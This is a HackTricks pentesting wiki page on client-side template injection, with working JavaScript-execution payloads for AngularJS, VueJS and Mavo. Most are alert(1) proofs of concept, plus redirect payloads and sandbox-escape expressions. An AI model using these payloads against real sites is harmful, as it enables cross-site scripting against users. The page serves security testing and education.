Client Side Template Injection (CSTI)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Summary

It is like a Server Side Template Injection but in the client. The SSTI can allow you to execute code on the remote server, the CSTI could allow you to execute arbitrary JavaScript code in the victim's browser.

Testing for this vulnerability is very similar as in the case of SSTI, the interpreter expects a template and will execute it. For example, with a payload like {{ 7-7 }}, if the app is vulnerable you will see a 0, and if not, you will see the original: {{ 7-7 }}

AngularJS

AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being ng-app. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces.

In scenarios where user input is dynamically inserted into the HTML body tagged with ng-app, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

You can find a very basic online example of the vulnerability in AngularJS in http://jsfiddle.net/2zs2yv7o/ and in Burp Suite Academy

Angular 1.6 removed the sandbox so from this version a payload like {{constructor.constructor('alert(1)')()}} or <input ng-focus=$event.view.alert('XSS')> should work.

VueJS

You can find a vulnerable Vue implementation in https://vue-client-side-template-injection-example.azu.now.sh/ Working payload: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

And the source code of the vulnerable example here: https://github.com/azu/vue-client-side-template-injection-example

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

A really good post on CSTI in VUE can be found in https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

V3

{{_openBlock.constructor('alert(1)')()}}

Credit: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Credit: Mario Heiderich

Check more VUE payloads in https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Payload:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

More payloads in https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations

Brute-Force Detection List

Auto_Wordlists/ssti.txt at main · carlospolop/Auto_WordlistsGitHub

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousClickjacking NextClient Side Path Traversal

Last updated 2 months ago